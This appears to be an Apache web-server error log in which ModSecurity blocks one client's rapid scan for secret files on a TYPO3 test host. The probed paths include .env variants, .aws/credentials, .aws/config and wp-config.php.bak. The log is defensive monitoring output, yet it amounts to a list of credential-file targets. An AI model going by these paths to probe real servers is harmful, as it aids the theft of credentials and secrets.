[Sun Jul 27 09:04:48.197492 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aIXPkOWBJAKUjtGl5KHi9AAAABY"]
[Sun Jul 27 09:04:48.197797 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aIXPkOWBJAKUjtGl5KHi9AAAABY"]
[Sun Jul 27 09:04:48.197977 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aIXPkOWBJAKUjtGl5KHi9AAAABY"]
[Sun Jul 27 09:04:48.270377 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi9gAAABY"]
[Sun Jul 27 09:04:48.270595 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi9gAAABY"]
[Sun Jul 27 09:04:48.270749 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi9gAAABY"]
[Sun Jul 27 09:04:48.301566 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aIXPkOWBJAKUjtGl5KHi9wAAABY"]
[Sun Jul 27 09:04:48.301708 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aIXPkOWBJAKUjtGl5KHi9wAAABY"]
[Sun Jul 27 09:04:48.301922 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aIXPkOWBJAKUjtGl5KHi9wAAABY"]
[Sun Jul 27 09:04:48.302084 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aIXPkOWBJAKUjtGl5KHi9wAAABY"]
[Sun Jul 27 09:04:48.379324 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aIXPkOWBJAKUjtGl5KHi-QAAABY"]
[Sun Jul 27 09:04:48.379568 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aIXPkOWBJAKUjtGl5KHi-QAAABY"]
[Sun Jul 27 09:04:48.379728 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aIXPkOWBJAKUjtGl5KHi-QAAABY"]
[Sun Jul 27 09:04:48.460085 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi-wAAABY"]
[Sun Jul 27 09:04:48.460452 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi-wAAABY"]
[Sun Jul 27 09:04:48.460688 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi-wAAABY"]
[Sun Jul 27 09:04:48.614140 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi_QAAABY"]
[Sun Jul 27 09:04:48.614391 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi_QAAABY"]
[Sun Jul 27 09:04:48.614581 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi_QAAABY"]
[Sun Jul 27 09:04:48.677758 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi_gAAABY"]
[Sun Jul 27 09:04:48.677985 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi_gAAABY"]
[Sun Jul 27 09:04:48.678153 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHi_gAAABY"]
[Sun Jul 27 09:04:48.744270 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravael/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravael/core/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHjAAAAABY"]
[Sun Jul 27 09:04:48.744502 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravael/core/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHjAAAAABY"]
[Sun Jul 27 09:04:48.744660 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravael/core/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHjAAAAABY"]
[Sun Jul 27 09:04:48.804658 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aIXPkOWBJAKUjtGl5KHjAgAAABY"]
[Sun Jul 27 09:04:48.804955 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aIXPkOWBJAKUjtGl5KHjAgAAABY"]
[Sun Jul 27 09:04:48.805151 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aIXPkOWBJAKUjtGl5KHjAgAAABY"]
[Sun Jul 27 09:04:48.827109 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHjAwAAABY"]
[Sun Jul 27 09:04:48.827295 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHjAwAAABY"]
[Sun Jul 27 09:04:48.827447 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHjAwAAABY"]
[Sun Jul 27 09:04:48.888151 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aIXPkOWBJAKUjtGl5KHjBQAAABY"]
[Sun Jul 27 09:04:48.888377 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aIXPkOWBJAKUjtGl5KHjBQAAABY"]
[Sun Jul 27 09:04:48.888533 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aIXPkOWBJAKUjtGl5KHjBQAAABY"]
[Sun Jul 27 09:04:48.910314 2025] [authz_core:error] [pid 1495876] [client 185.177.72.115:16562] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sun Jul 27 09:04:48.971342 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awsstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/awsstats/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHjCAAAABY"]
[Sun Jul 27 09:04:48.971588 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/awsstats/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHjCAAAABY"]
[Sun Jul 27 09:04:48.971751 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/awsstats/.env"] [unique_id "aIXPkOWBJAKUjtGl5KHjCAAAABY"]
[Sun Jul 27 09:04:48.993441 2025] [authz_core:error] [pid 1495876] [client 185.177.72.115:16562] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak
[Sun Jul 27 09:04:49.015696 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjCgAAABY"]
